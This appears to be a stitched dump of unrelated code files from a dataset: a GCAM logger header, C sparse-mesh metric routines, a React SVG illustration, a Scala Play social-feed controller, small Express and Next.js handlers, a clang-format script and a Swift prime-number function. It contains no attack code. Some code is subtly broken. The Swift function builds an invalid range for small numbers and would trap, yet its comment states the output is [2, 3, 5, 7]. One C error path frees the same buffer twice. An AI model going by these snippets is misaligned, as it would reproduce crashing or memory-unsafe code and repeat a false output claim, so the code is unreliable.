* This computer software was prepared by Battelle Memorial Institute,
* hereinafter the Contractor, under Contract No. DE-AC05-76RL0 1830
* with the Department of Energy (DOE). NEITHER THE GOVERNMENT NOR THE
* CONTRACTOR MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR ASSUMES ANY
* LIABILITY FOR THE USE OF THIS SOFTWARE. This notice including this
* sentence must appear on any copies of this computer software.
*
* EXPORT CONTROL
* User agrees that the Software will not be shipped, transferred or
* exported into any country or used in any manner prohibited by the
* United States Export Administration Act or any other applicable
* export laws, restrictions or regulations (collectively the "Export Laws").
* Export of the Software may require some form of license or other
* authority from the U.S. Government, and failure to obtain such
* export control license may result in criminal liability under
* U.S. laws. In addition, if the Software is identified as export controlled
* items under the Export Laws, User represents and warrants that User
* is not a citizen, or otherwise located within, an embargoed nation
* (including without limitation Iran, Syria, Sudan, Cuba, and North Korea)
* and that User is not otherwise prohibited
* under the Export Laws from receiving the Software.
*
* Copyright 2011 Battelle Memorial Institute. All Rights Reserved.
* Distributed as open-source under the terms of the Educational Community
* License version 2.0 (ECL 2.0). http://www.opensource.org/licenses/ecl2.php
*
* For further details, see: http://www.globalchange.umd.edu/models/gcam/
*
*/
/*!
* \file logger.h
* \ingroup Objects
* \brief The Logger class header file.
* \author <NAME>
* \date $Date: 2007/01/11 23:52:34 $
* \version $Revision: 1.5.2.3 $
*/
#include <iosfwd>
#include <sstream>
#include <xercesc/dom/DOMNode.hpp>
#include "util/logger/include/ilogger.h"
// Forward definition of the Logger class.
class Logger;
class Tabs;
/*!
* \ingroup Objects
* \brief This is an overridden streambuffer class used by the Logger class.
*
* This is a very simple class which contains a pointer to its parent Logger.
* When the streambuf receives a character it passes it to its parent stream for processing.
*
* \author <NAME>
* \warning Overriding the iostream class is somewhat difficult so this class may be somewhat esoteric.
* \warning This is a write-only streambuf.
*/
class PassToParentStreamBuf: std::streambuf {
friend class Logger;
public:
PassToParentStreamBuf();
int overflow( int ch );
int underflow( int ch );
void setParent( Logger* parentIn );
void toDebugXML( std::ostream& out ) const;
private:
//! A pointer to the parent logger which will receive all data.
Logger* mParent;
};
// Forward definition of LoggerFactory class.
class LoggerFactory;
/*!
* \ingroup Objects
* \brief This is an abstract class which defines the interface to a Logger.
* \details Loggers may come in many different forms, but must use the defined
* interface. Each error message is given a priority, and the user may
* set the level of log messages they wish to print. Loggers are
* singletons and can only be instantiated by the LoggerFactory class.
*
* \author <NAME>
* \date $Date: 2007/01/11 23:52:34 $
* \version $Revision: 1.5.2.3 $
* \warning This is an abstract class and cannot be instantiated.
* \warning Loggers can only be created by the LoggerFactory.
*/
class Logger: public ILogger {
//! Friend declaration to allow LoggerFactory to create Loggers.
friend class LoggerFactory;
public:
virtual ~Logger(); //!< Virtual destructor.
virtual void open( const char[] = 0 ) = 0; //!< Pure virtual function called to begin logging.
int receiveCharFromUnderStream( int ch ); //!< Pure virtual function called to complete the log and clean up.
virtual void close() = 0;
void setLevel( const ILogger::WarningLevel newLevel );
void toDebugXML( std::ostream& out, Tabs* tabs ) const;
protected:
//! Logger name
std::string mName;
//! Logger type
std::string mType;
//! File name of the file it uses.
std::string mFileName;
//! Header message to print at the beginning of the log.
std::string mHeaderMessage;
//! Defines the minimum level of messages which should be printed.
ILogger::WarningLevel mMinLogWarningLevel;
//! Defines the minimum level of warnings to print to the console.
ILogger::WarningLevel mMinToScreenWarningLevel;
//! Defines the current warning level.
ILogger::WarningLevel mCurrentWarningLevel;
//! Defines whether to print the warning level.
bool mPrintLogWarningLevel;
Logger( const std::string& aFileName = "" );
//! Log a message with the given warning level.
virtual void logCompleteMessage( const std::string& aMessage ) = 0;
void printToScreenIfConfigured( const std::string& aMessage );
static void parseHeader( std::string& aHeader );
const static int MAX_LINE_SIZE = 5000;
static const std::string& convertLevelToString( ILogger::WarningLevel aLevel );
private:
//! Buffer which contains characters waiting to be printed.
std::stringstream mBuf;
//! Underlying ofstream
PassToParentStreamBuf mUnderStream;
void XMLParse( const xercesc::DOMNode* node );
static const std::string getTimeString();
static const std::string getDateString();
};
#endif // _LOGGER_H_
|
/**
* \brief Especialitzacio del Rol Centralcap a l'esquerra
* @file CentralEsquerra.java
*/
public class CentralEsquerra extends Central{
@Override
public String toString()
{
return this.getClass().getName();
}
}
|
<gh_stars>0
#include <errno.h>
#include <stdlib.h>
#include <string.h>
// #include "array_indexed.h"
#include "double.h"
#include "int.h"
#include "mesh_qc.h"
static vector_sparse * mesh_qc_metric_p_i(
int m_cn_0, const jagged1 * m_cf_p_0_i, int p, int i, double m_vol_p_i)
{
double denominator_p_i;
vector_sparse * m_metric_p_i;
m_metric_p_i = (vector_sparse *) malloc(sizeof(vector_sparse));
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
"m_metric[%d][%d]\n", p, i);
goto end;
}
m_metric_p_i->length = m_cn_0;
m_metric_p_i->nonzero_max = m_cf_p_0_i->a0;
m_metric_p_i->positions =
(int *) malloc(sizeof(int) * m_metric_p_i->nonzero_max);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
"m_metric[%d][%d]->positions\n", p, i);
goto m_metric_p_i_free;
}
memcpy(m_metric_p_i->positions, m_cf_p_0_i->a1,
sizeof(int) * m_metric_p_i->nonzero_max);
m_metric_p_i->values =
(double *) malloc(sizeof(double) * m_metric_p_i->nonzero_max);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
"m_metric[%d][%d]->values\n", p, i);
goto m_metric_p_i_positions_free;
}
denominator_p_i = ((double) m_cf_p_0_i->a0) * (m_vol_p_i * m_vol_p_i);
double_array_assign_constant(
m_metric_p_i->values, m_metric_p_i->nonzero_max, 1 / denominator_p_i);
// vector_sparse_rearange(m_metric_p_i);
// if (errno)
// {
// fprintf(stderr,
// "mesh_qc_metric_p_i - cannot rearange m_metric[%d][%d]\n", p, i);
// goto m_metric_p_i_values_free;
// }
return m_metric_p_i;
/* cleaning if an error occurs */
// m_metric_p_i_values_free:
// free(m_metric_p_i->values);
m_metric_p_i_positions_free:
free(m_metric_p_i->positions);
m_metric_p_i_free:
free(m_metric_p_i);
end:
return NULL;
}
vector_sparse ** mesh_qc_metric_p(
const mesh_qc * m, int p, const double * m_vol_p)
{
int i, m_cn_p;
int * m_cn;
jagged1 m_cf_p_0_i;
vector_sparse ** m_metric_p;
m_cn = m->cn;
m_cn_p = m_cn[p];
m_metric_p = (vector_sparse **) malloc(sizeof(vector_sparse *) * m_cn_p);
if (errno)
{
fprintf(stderr,
"mesh_qc_metric_p - cannot allocate memory for m_metric[%d]\n", p);
return NULL;
}
for (i = 0; i < m_cn_p; ++i)
{
mesh_cf_part3(&m_cf_p_0_i, m, p, 0, i);
m_metric_p[i] = mesh_qc_metric_p_i(m_cn[0], &m_cf_p_0_i, p, i, m_vol_p[i]);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p - cannot calculate "
"m_metric[%d][%d]\n", p, i);
vector_sparse_array_free(m_metric_p, i);
return NULL;
}
}
return m_metric_p;
}
vector_sparse *** mesh_qc_metric(const mesh_qc * m, double ** m_vol)
{
int m_dim, p;
vector_sparse *** m_metric;
m_dim = m->dim;
m_metric = (vector_sparse ***) malloc(sizeof(vector_sparse **) * (m_dim + 1));
if (errno)
{
fprintf(stderr, "mesh_qc_metric - cannot allocate memory for m_metric\n");
return NULL;
}
for (p = 0; p <= m_dim; ++p)
{
m_metric[p] = mesh_qc_metric_p(m, p, m_vol[p]);
if (errno)
{
fprintf(stderr, "mesh_qc_metric - cannot calculate m_metric[%d]\n", p);
vector_sparse_array2_free(m_metric, p, m->cn);
return NULL;
}
}
return m_metric;
}
static vector_sparse * mesh_qc_metric_p_i_fscan(
FILE * in, int m_cn_0, const jagged1 * m_cf_p_0_i, int p, int i)
{
vector_sparse * m_metric_p_i;
m_metric_p_i = (vector_sparse *) malloc(sizeof(vector_sparse));
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot allocate memory for "
"m_metric[%d][%d]\n", p, i);
goto end;
}
m_metric_p_i->length = m_cn_0;
m_metric_p_i->nonzero_max = m_cf_p_0_i->a0;
m_metric_p_i->positions =
(int *) malloc(sizeof(int) * m_metric_p_i->nonzero_max);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot allocate memory for "
"m_metric[%d][%d]->positions\n", p, i);
goto m_metric_p_i_free;
}
memcpy(m_metric_p_i->positions, m_cf_p_0_i->a1,
sizeof(int) * m_metric_p_i->nonzero_max);
m_metric_p_i->values =
double_array_fscan(in, m_metric_p_i->nonzero_max, "--raw");
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot scan "
"m_metric[%d][%d]->values\n", p, i);
free(m_metric_p_i->positions);
goto m_metric_p_i_positions_free;
}
return m_metric_p_i;
/* cleaning if an error occurs */
m_metric_p_i_positions_free:
free(m_metric_p_i->positions);
m_metric_p_i_free:
free(m_metric_p_i);
end:
return NULL;
}
vector_sparse ** mesh_qc_metric_p_fscan(FILE * in, const mesh_qc * m, int p)
{
int i, m_cn_p;
int * m_cn;
jagged1 m_cf_p_0_i;
vector_sparse ** m_metric_p;
m_cn = m->cn;
m_cn_p = m_cn[p];
m_metric_p = (vector_sparse **) malloc(sizeof(vector_sparse *) * m_cn_p);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_p_fscan - cannot allocate memory for "
"m_metric[%d]\n", p);
return NULL;
}
for (i = 0; i < m_cn_p; ++i)
{
mesh_cf_part3(&m_cf_p_0_i, m, p, 0, i);
m_metric_p[i] = mesh_qc_metric_p_i_fscan(in, m_cn[0], &m_cf_p_0_i, p, i);
if (errno)
{
fprintf(stderr,
"mesh_qc_metric_p_fscan - cannot scan m_metric[%d][%d]\n", p, i);
vector_sparse_array_free(m_metric_p, i);
return NULL;
}
}
return m_metric_p;
}
vector_sparse *** mesh_qc_metric_fscan(FILE * in, const mesh_qc * m)
{
int m_dim, p;
vector_sparse *** m_metric;
m_dim = m->dim;
m_metric = (vector_sparse ***) malloc(sizeof(vector_sparse **) * (m_dim + 1));
if (errno)
{
fputs("mesh_qc_metric_fscan - cannot allocate memory for m_metric\n",
stderr);
return NULL;
}
for (p = 0; p <= m_dim; ++p)
{
m_metric[p] = mesh_qc_metric_p_fscan(in, m, p);
if (errno)
{
fprintf(stderr, "mesh_qc_metric_fscan - cannot scan m_metric[%d]\n", p);
vector_sparse_array2_free(m_metric, p, m->cn);
return NULL;
}
}
return m_metric;
}
|
import React from "react";
// Styles
import styles from "./Contact.module.scss";
const Illustration = () => {
return (
<div className={styles.Illustration}>
<svg
width="588.124"
height="550"
viewBox="0 0 588.124 550"
className={styles.IllustrationContent}
>
<g
id="Contact_Illustrator"
data-name="Contact Illustrator"
transform="translate(-1101.659 -1209)"
>
<g id="Chat" transform="translate(1074.02 1209.281)">
<path
id="Path_33"
data-name="Path 33"
d="M335.819,347.441,314.094,371.8c18.049,7.656,36.318-2.972,43.807-8.3a108.5,108.5,0,1,0-22.082-16.053Z"
transform="translate(-274.012 -160.176)"
fill="#e6e6e6"
/>
<path
id="Path_34"
data-name="Path 34"
d="M357.947,261.769c22.413-.233,44.823-.634,67.236-.938q11.207-.152,22.416-.267c6.438-.067,6.455-10.078,0-10.011-22.413.233-44.823.634-67.236.939q-11.208.152-22.416.267c-6.438.067-6.455,10.078,0,10.011Z"
transform="translate(-280.344 -171.333)"
/>
<path
id="Path_35"
data-name="Path 35"
d="M357.947,288.406l90.585-.939,25.763-.267c6.438-.067,6.455-10.078,0-10.011l-90.585.939-25.763.267C351.508,278.461,351.492,288.473,357.947,288.406Z"
transform="translate(-280.344 -174.611)"
/>
<path
id="Path_48"
data-name="Path 48"
d="M674.951,363.255A108.3,108.3,0,1,0,618.7,458.268c7.489,5.329,25.759,15.957,43.807,8.3l-21.726-24.354a108.032,108.032,0,0,0,34.167-78.959Z"
transform="translate(-293.296 -171.879)"
fill="#f9a826"
/>
<path
id="Path_49"
data-name="Path 49"
d="M517.969,356.5c22.413-.233,44.824-.634,67.236-.938q11.208-.152,22.415-.267c6.438-.067,6.455-10.078,0-10.011-22.413.233-44.823.634-67.236.938q-11.208.152-22.416.267C511.531,346.553,511.515,356.564,517.969,356.5Z"
transform="translate(-300.038 -182.991)"
/>
<path
id="Path_50"
data-name="Path 50"
d="M517.969,383.134l90.585-.938,25.763-.267c6.438-.067,6.454-10.078,0-10.011l-90.585.939-25.763.267c-6.438.067-6.454,10.078,0,10.011Z"
transform="translate(-300.038 -186.269)"
/>
<path
id="Path_51"
data-name="Path 51"
d="M517.969,409.772l90.585-.939,25.763-.267c6.438-.067,6.454-10.078,0-10.011l-90.585.939-25.763.267C511.531,399.827,511.515,409.839,517.969,409.772Z"
transform="translate(-300.038 -189.547)"
/>
</g>
<g id="Person" transform="translate(1519.998 1209)">
<path
id="Path_52"
data-name="Path 52"
d="M323.828,211.155s8.391,19.929-10.489,29.369,50.347,27.271,57.689,4.2c0,0-18.88-7.342-10.489-29.369Z"
transform="translate(-241.974 -143.395)"
fill="#ffb9b9"
/>
<path
id="Path_53"
data-name="Path 53"
d="M120.167,552.567l-1.049,22.027,17.831,3.147V555.714Z"
transform="translate(-15.762 -73.118)"
fill="#ffb9b9"
/>
<path
id="Path_54"
data-name="Path 54"
d="M40.4,552.567l1.049,22.027-17.831,3.147V555.714Z"
transform="translate(-3.125 -73.118)"
fill="#ffb9b9"
/>
<circle
id="Ellipse_5"
data-name="Ellipse 5"
cx="29.369"
cy="29.369"
r="29.369"
transform="translate(72.938 21.084)"
fill="#ffb9b9"
/>
<path
id="Path_55"
data-name="Path 55"
d="M164.895,303.544l-1.05,8.391,5.245,19.93,7.341-17.831Z"
transform="translate(-21.68 -40.166)"
fill="#ffb9b9"
/>
<path
id="Path_56"
data-name="Path 56"
d="M260.235,439.752l-6.293,74.471S246.6,527.859,250.8,539.4c0,0-6.293,15.734-4.2,20.978s3.147,10.489,1.049,12.587-3.147,60.836,0,66.08,5.244,17.831,5.244,17.831,17.831,4.2,22.027-7.342,2.1-12.587,6.293-15.733,4.2-47.2,4.2-47.2-5.244-5.245-2.1-7.342,5.244,0,2.1-5.245-8.391-5.245-3.147-7.342a50,50,0,0,0,8.391-4.2l30.418-79.716s11.538,89.156,13.635,93.352,5.245-1.049,2.1,4.2-4.2,2.1-3.147,5.244-6.293,48.249-2.1,57.689a142.158,142.158,0,0,1,6.293,16.782s16.782,7.342,18.88,2.1,1.049-14.684,4.2-15.733,6.293-3.146,6.293-11.538,6.293-49.3,6.293-49.3-7.342-3.146-5.245-8.391,2.1-4.2,1.049-8.391-3.147-5.244-1.049-8.391,2.1-12.587,2.1-12.587l12.587-82.862-9.72-28.32Z"
transform="translate(-233.449 -173.227)"
fill="#2f2e41"
/>
<path
id="Path_57"
data-name="Path 57"
d="M352.322,704.474s-3.147-3.146-4.2,0-1.049,32.516-1.049,32.516,8.391,6.293,8.391,9.44,6.293,13.635,20.978,11.538q.22-.032.436-.066a13.887,13.887,0,0,0,10.326-19.657l-14.957-31.673S361.763,696.083,352.322,704.474Z"
transform="translate(-246.868 -208.243)"
fill="#2f2e41"
/>
<path
id="Path_58"
data-name="Path 58"
d="M267.814,704.474s3.147-3.146,4.2,0,1.049,32.516,1.049,32.516-8.391,6.293-8.391,9.44-6.293,13.635-20.978,11.538q-.22-.032-.436-.066a13.887,13.887,0,0,1-10.325-19.657l14.957-31.673S258.373,696.083,267.814,704.474Z"
transform="translate(-231.587 -208.243)"
fill="#2f2e41"
/>
<path
id="Path_59"
data-name="Path 59"
d="M322.147,151.7l-5.247-2.1s10.971-12.079,26.236-11.029l-4.293-4.727s10.494-4.2,20.035,6.827c5.015,5.8,10.818,12.612,14.435,20.289h5.619l-2.345,5.164,8.209,5.164-8.425-.928a28.576,28.576,0,0,1-.8,13.375l.226,4.082s-9.767-15.11-9.767-17.212v5.252s-5.247-4.727-5.247-7.878l-2.862,3.676-1.431-5.777-17.65,5.777,2.862-4.727-10.972,1.576,4.293-5.777s-12.4,6.827-12.88,12.6-6.678,13.129-6.678,13.129l-2.862-5.252S308.314,159.581,322.147,151.7Z"
transform="translate(-242.224 -133.061)"
fill="#2f2e41"
/>
<path
id="Path_60"
data-name="Path 60"
d="M400.286,266.157h11.686a3.781,3.781,0,0,1,3.69,2.95c1.8,7.985,6.45,30.62,5.6,48.446-1.049,22.027,1.049,37.76,0,40.907s0,4.2,0,7.342,3.147,1.049,0,5.245-3.147,3.147-3.147,6.293-10.489,51.4-10.489,51.4-7.211-11.852-15.143-9.6l1.508-42.848,2.1-17.831-3.147-31.467Z"
transform="translate(-252.877 -150.674)"
fill="#3f3d56"
/>
<path
id="Path_61"
data-name="Path 61"
d="M331.954,252.215s-17.831-.648-23.6-8.191c0,0-37.236,12.387-41.431,22.875s14.684,57.689,14.684,57.689-32.516,96.5-16.782,96.5,51.4,12.587,72.374,5.244a269.7,269.7,0,0,1,39.858-10.489s2.1-28.32,0-33.564-7.342-2.1-4.2-9.44,2.1-8.391,1.049-11.537,2.1-7.343,2.1-11.538-1.049-13.635-1.049-13.635,28.32-66.08,22.027-72.374-38.328-18.42-38.328-18.42S349.785,256.411,331.954,252.215Z"
transform="translate(-235.416 -147.744)"
fill="#3f3d56"
/>
<path
id="Path_62"
data-name="Path 62"
d="M247.524,448.694s-9.44,49.3,6.293,45.1,8.391-45.1,8.391-45.1Z"
transform="translate(-233.324 -174.827)"
fill="#ffb9b9"
/>
<path
id="Path_63"
data-name="Path 63"
d="M270.852,266.157l-3.725,1.863a10.5,10.5,0,0,0-5.627,7.46l-14.772,78.784s-4.2,9.44-4.2,10.489,2.1,1.049,0,4.2-5.244,2.1-3.147,4.2a6.5,6.5,0,0,1,2.1,4.2l2.1,51.4s17.831-5.245,23.075,0c0,0-5.244-15.733-2.1-20.978s3.147-12.587,3.147-12.587-2.1,0,3.146-5.244,6.293-7.342,5.245-8.391S274,371.046,274,370s10.489-71.325,10.489-71.325Z"
transform="translate(-232.527 -150.674)"
fill="#3f3d56"
/>
</g>
</g>
</svg>
</div>
);
};
export default Illustration;
|
package controllers
import play.api.mvc.{Action, Controller}
import play.api.Routes
import models._
import play.api.libs.json.Json
import play.api.libs.json._
import play.api.libs.json.Reads._
import play.api.libs.functional.syntax._
import java.sql.Timestamp
import java.util.Date
import play.api.mvc.Results
object Application extends Controller with Secured {
/**
* Index action ... for index page for news feed page
*/
def index = withUser { user => implicit request =>
val feed = UserDAO.getFeed(user.id.get)
Ok(views.html.index(feed))
}
/**
* class for post data
*/
case class PostData(topicId: Long, content: String)
/**
* post action which consumes post data in the form of JSON
*/
def post() = withUserWithBodyParser(parse.json) { user => implicit request =>
/**
* Reads[PostData] helps to convert Json data to PostData object which will be further converted to POST object and persisted in Database
*/
implicit val postDataReads: Reads[PostData] = (
(JsPath \ "topicId").read[Long] and
(JsPath \ "content").read[String](minLength[String](10))
)(PostData.apply _)
request.body.validate[PostData].fold(
valid = { postData =>
val post = Post(user.id.get, postData.topicId, new Timestamp(new Date().getTime()), postData.content, None)
UserDAO.savePost(post)
Ok("saved to Database")
},
invalid = { errors =>
BadRequest(JsError.toFlatJson(errors))
}
)
}
/**
* Javascript Routes action
*/
def javascriptRoutes() = Action { implicit request =>
import routes.javascript._
Ok(Routes.javascriptRouter("jsRoutes")(
controllers.routes.javascript.Application.post,
controllers.routes.javascript.Application.message,
controllers.routes.javascript.Application.endorseOrDismissPost,
controllers.routes.javascript.Application.endorseOrDismissComment,
controllers.routes.javascript.Application.comment,
controllers.routes.javascript.Application.subscribePost,
controllers.routes.javascript.Application.subscribeUser,
controllers.routes.javascript.Application.subscribeTopic,
controllers.routes.javascript.Application.posts,
controllers.routes.javascript.Application.isTopicSubscribed,
controllers.routes.javascript.Application.isEndorsedPost
)
).as(JAVASCRIPT)
}
/**
* example of exposing action as javascript routes
*/
def message = Action {
Ok(Json.toJson("hello world"))
}
/**
* queries database get the feeds data and incrementally sends it to user
*/
/*
def feed() = withUser { user => implicit request =>
val feed = UserDAO.getFeed(user.id.get)
implicit val feedWrites: Writes[(User, Post)] = new Writes[(User, Post)] {
def writes(feeds: ((User, Post)) ): JsValue = Json.obj(
"uid" -> Json.toJson(feeds._1.id.get),
"email" -> Json.toJson(feeds._1.email),
"description" -> Json.toJson(feeds._1.desc),
"location" -> Json.toJson(feeds._1.location),
"postid" -> Json.toJson(feeds._2.id),
"content" -> Json.toJson(feeds._2.content),
"timestamp" -> Json.toJson(feeds._2.timestamp),
"topicId" -> Json.toJson(feeds._2.topicId)
)
}
Ok(Json.toJson(feed)).as(JAVASCRIPT)
}*/
/**
* like or unlike post and send the current state
*/
def endorseOrDismissPost(postId: Long) = withUser { user => implicit request =>
val endorsed = UserDAO.isEndorsedPost(user.id.get, postId)
if(endorsed){
UserDAO.endorseOrDismissPost(user.id.get, postId)
Ok(Json.toJson("endorse"))
}else {
UserDAO.endorseOrDismissPost(user.id.get, postId)
Ok(Json.toJson("dismiss"))
}
}
/**
* like or unlike comment
*/
def endorseOrDismissComment(commentId: Long) = withUser { user => implicit request =>
val endorsed = UserDAO.isEndorsedComment(user.id.get, commentId)
if(endorsed) {
UserDAO.endorseOrDismissComment(user.id.get, commentId)
Ok(Json.toJson("endorse"))
}else {
UserDAO.endorseOrDismissComment(user.id.get, commentId)
Ok(Json.toJson("dismiss"))
}
}
/**
* Helper class for taking comment data from json
*/
case class CommentData(postId: Long, content: String)
/**
* action for adding comments to a post
*/
def comment() = withUserWithBodyParser(parse.json) { user => implicit request =>
/**
* Reads ... helps in reading the JSON content and converts into CommentData object
*/
implicit val commentDataReads: Reads[CommentData] = (
(JsPath \ "postId").read[Long] and
(JsPath \ "content").read[String](minLength[String](1))
)(CommentData.apply _)
request.body.validate[CommentData].fold(
valid = {commentData =>
val comment = Comment(user.id.get, commentData.postId, commentData.content)
UserDAO.saveComment(comment)
Ok("saved")
},
invalid = {errors =>
Results.BadRequest(JsError.toFlatJson(errors))
}
)
}
def profile(email: String) = withUser { user => implicit request =>
UserDAO.findOneByEmail(email) match {
case Some(p) => Ok(views.html.user(p))
case None => Results.Forbidden
}
}
def subscribePost(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isPostSubscribed(user.id.get, id)
if(subscribed) {
UserDAO.subscribeOrUnsubscribePost(user.id.get, id)
Ok("unsubscribed").as(JAVASCRIPT)
}else {
UserDAO.subscribeOrUnsubscribePost(user.id.get, id)
Ok("subscribed").as(JAVASCRIPT)
}
}
def subscribeUser(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isUserSubscribed(user.id.get, id)
if(subscribed) {
UserDAO.subscribeOrUnsubscribeUser(user.id.get, id)
Ok("unsubscribed").as(JAVASCRIPT)
}else {
UserDAO.subscribeOrUnsubscribeUser(user.id.get, id)
Ok("subscribed").as(JAVASCRIPT)
}
}
def subscribeTopic(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isTopicSubscribed(user.id.get, id)
if(subscribed) {
UserDAO.subscribeOrUnsubscribeTopic(user.id.get, id)
Ok(Json.toJson("follow"))
}else {
UserDAO.subscribeOrUnsubscribeTopic(user.id.get, id)
Ok(Json.toJson("unfollow"))
}
}
/*
def posts() = withUser { user => implicit request =>
val posts = UserDAO.getPosts(user.id.get)
implicit val postWrites: Writes[Post] = new Writes[Post] {
def writes(p: Post): JsValue = Json.obj(
"postId" -> p.id,
"content" -> p.content,
"userId" -> p.userId,
"topicId" -> p.topicId,
"timestamp" -> p.timestamp
)
}
Ok(Json.toJson(posts))
}
*/
def posts() = withUser { user => implicit request =>
val posts = UserDAO.getPosts(user.id.get)
Ok(views.html.posts(posts))
}
def topics = withUser { user => implicit request =>
Ok(views.html.topics(user))
}
def isEndorsedPost(id: Long) = withUser { user => implicit request =>
val endorsed = UserDAO.isEndorsedPost(user.id.get, id)
Ok(Json.toJson(endorsed)).as(JAVASCRIPT)
}
def isEndorsedComment(id: Long) = withUser { user => implicit request =>
val endorsed = UserDAO.isEndorsedComment(user.id.get, id)
Ok(Json.toJson(endorsed)).as(JAVASCRIPT)
}
def isUserSubscribed(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isUserSubscribed(user.id.get, id)
Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
}
def isPostSubscribed(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isPostSubscribed(user.id.get, id)
Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
}
def isTopicSubscribed(id: Long) = withUser { user => implicit request =>
val subscribed = UserDAO.isTopicSubscribed(user.id.get, id)
Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
}
def showPost(postId: Long) = withUser { user => implicit request =>
Ok("")
}
}
|
const express = require('express')
const { uploader } = require('../middleware/multerFile')
const router = express.Router()
// Controllers
const { uploadFile, getComboFile } = require('../controllers/womboController')
// Routes
router.post('/list/upload', uploader.any(), uploadFile)
router.get('/list/download', getComboFile)
module.exports = router
|
import { NextApiRequest, NextApiResponse } from "next";
import { removeTokenCookie } from "~/lib/api/account";
export default async function logout(
req: NextApiRequest,
res: NextApiResponse
) {
if (req.method === "POST") {
removeTokenCookie(res);
res.end();
}
}
|
#!/usr/bin/env bash
set -e
script_path=$(cd -P -- "$(dirname -- "$0")" && pwd -P)
cd "${script_path}/.." || exit 1
if [ "$#" -eq "1" ]; then
mapfile -t files < <(
git ls-files -- \
'*.cpp' \
'*.h' \
':!:Base' \
':!:Kernel/Arch/i386/CPU.cpp' \
':!:Kernel/FileSystem/ext2_fs.h' \
':!:Userland/Libraries/LibC/getopt.cpp' \
':!:Userland/Libraries/LibC/syslog.h' \
':!:Userland/Libraries/LibCore/puff.h' \
':!:Userland/Libraries/LibCore/puff.cpp' \
':!:Userland/Libraries/LibELF/exec_elf.h'
)
else
files=()
for file in "${@:2}"; do
if [[ "${file}" == *".cpp" || "${file}" == *".h" ]]; then
files+=("${file}")
fi
done
fi
if (( ${#files[@]} )); then
CLANG_FORMAT=false
if command -v clang-format-11 >/dev/null 2>&1 ; then
CLANG_FORMAT=clang-format-11
elif command -v clang-format >/dev/null 2>&1 ; then
CLANG_FORMAT=clang-format
if ! "${CLANG_FORMAT}" --version | grep -qF ' 11.' ; then
echo "You are using '$("${CLANG_FORMAT}" --version)', which appears to not be clang-format 11."
echo "It is very likely that the resulting changes are not what you wanted."
fi
else
echo "clang-format-11 is not available, but C or C++ files need linting! Either skip this script, or install clang-format-11."
echo "(If you install a package 'clang-format', please make sure it's version 11.)"
exit 1
fi
if [ "$#" -gt "0" ] && [ "x--overwrite-inplace" = "x$1" ] ; then
true # The only way to run this script.
else
# Note that this branch also covers --help, -h, -help, -?, etc.
echo "USAGE: $0 --overwrite-inplace"
echo "The argument is necessary to make you aware that this *will* overwrite your local files."
exit 1
fi
echo "Using ${CLANG_FORMAT}"
"${CLANG_FORMAT}" -style=file -i "${files[@]}"
echo "Maybe some files have changed. Sorry, but clang-format doesn't indicate what happened."
else
echo "No .cpp or .h files to check."
fi
|
func primeNumbers(upTo n: Int) -> [Int] {
var primes = [Int]()
for num in 2..<n {
var isPrime = true
let maxDivisor = Int(sqrt(Double(num)))
for divisor in 2...maxDivisor {
if num % divisor == 0 {
isPrime = false
break
}
}
if isPrime {
primes.append(num)
}
}
return primes
}
let result = primeNumbers(upTo: 10)
print(result)
// Output: [2, 3, 5, 7]
|
import { ReactNode } from 'react';
export interface Props {
name: string;
title: string;
body: ReactNode;
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.